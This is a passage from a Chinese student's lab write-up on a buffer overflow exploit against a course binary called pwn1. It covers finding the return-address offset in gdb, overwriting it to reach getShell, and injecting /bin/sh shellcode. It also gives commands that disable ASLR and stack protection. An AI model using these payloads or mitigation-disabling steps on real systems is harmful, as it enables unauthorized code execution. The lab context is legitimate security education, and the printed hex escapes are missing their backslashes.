使用objdump -d pwn2
对pwn2
反汇编,检查call指令
是否正确调用getShell
运行pwn2,发现会得到shell提示符,证明我们的修改成功改变了程序执行流程
3 通过构造输入参数,造成BOF攻击,改变程序执行流
知识要求:堆栈结构,返回地址
学习目标:理解攻击缓冲区的结果,掌握返回地址的获取
进阶:掌握ELF文件格式,掌握动态技术
3.1反汇编,了解程序的基本功能
-
- 首先使用
objdump -d pwn1 | more
进行反汇编,了解程序的基本功能- 该可执行文件正常运行是调用如下函数foo,这个函数有
Buffer overflow
漏洞,我们的目标是利用此漏洞覆盖返回地址
- 该可执行文件正常运行是调用如下函数foo,这个函数有
- 首先使用
3.2确认输入字符串哪几个字符会覆盖到返回地址
用gdb pwn1调试程序,输入有规律的字符串如1111111122222222333333334444444412345678,发生段错误产生溢出
使用info r查看寄存器eip的值,发现输入的1234被覆盖到堆栈上的返回地址,接下来我们就要把字符串中会覆盖EIP的字符替换成getShell的地址。
3.3 确认用什么值来覆盖返回地址
于是我们将getShell的地址0x0804847d把后面的数值替换,即是输入11111111222222223333333344444444x7dx84x04x08
3.4 构造输入字符串
由为我们没法通过键盘输入x7dx84x04x08这样的16进制值,所以先生成包括这样字符串的一个文件。x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
于是我们通过输入perl -e 'print "11111111222222223333333344444444x7dx84x04x08x0a"' > input来生成这样的文件。然后使用vim查看input文件的内容是否如预期。
通过管道符|,将input文件作为pwn1的输入。(不知道是什么原因,input里输入的东西没显示出来,但不影响正常使用)
4. 注入Shellcode并执行
4.1 准备一段Shellcode
shellcode就是一段机器指令(code)
通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。
在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
实践采用老师推荐的shellcode。如下:
x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80
4.2准备工作
在root用户下进行准备工作apt-get install execstack //安装execstack execstack -s pwn1 //设置堆栈可执行 execstack -q pwn1 //查询文件的堆栈是否可执行,显示X pwn1则表示可执行 more /proc/sys/kernel/randomize_va_space //查看随机化是否关闭,如显示0则已关闭,否则未关闭 echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化 more /proc/sys/kernel/randomize_va_space
Linux下有两种基本构造攻击buf的方法:
retaddr+nop+shellcode
nop+shellcode+retaddr。
因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面,简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边
本次实验使用的缓冲区足够放shellcode,所以采用nops+shellcode+retaddr,使用如下命令使输出重定向>将perl生成的字符串存储到文件input_shellcode中
perl -e 'print "x90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x4x3x2x1x00"' > input_shellcode
打开一个终端使用(cat input_shellcode;cat) | ./pwn1
注入这段攻击buf
再开另外一个终端,用gdb
来调试pwn1这个进程,输入ps -ef | grep pwn1
找到pwn1的进程号是17190
在gdb
中使用attach 17190
调试这个进程,使用disassemble foo
查看到ret
的地址
0xffffd2cc
存放的数据是01020304
,那么shellcode地址就是0xffffd390
修改input_shellcode
文件对应代码为:
perl -e 'print "A" x 32;print "x90xd3xffxffx90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00"' > input_shellcode
然后使用(cat input_shellcode;cat) | ./pwn1
将input_shellcode
的输入,通过管道符“|”,作为pwn1
的输入
5 实验收获与感想
这次是网络对抗技术的第一次实验,是关于pc平台的逆向破解的,我通过教程以及不断的请教询问同学们,完成了本次实验。通过本次实验,学会了修改程序机器指令、Shellcode注入执行等新的知识,也巩固了课上所学,不过过程中还是出现了很多问题,这也让我认识到下一次实验和课程中需要更加认真的学习基础知识。
6 什么是漏洞?漏洞有什么危害?
漏洞就是计算机计算机硬件、软件、协议、安全策略等方面的一些设置不当或者安全缺陷,利用这些缺陷,攻击者可以对计算机系统进行攻击。
可能会导致受害者受到经济损失、机密泄露、隐私暴露、数据篡改等方面的危害。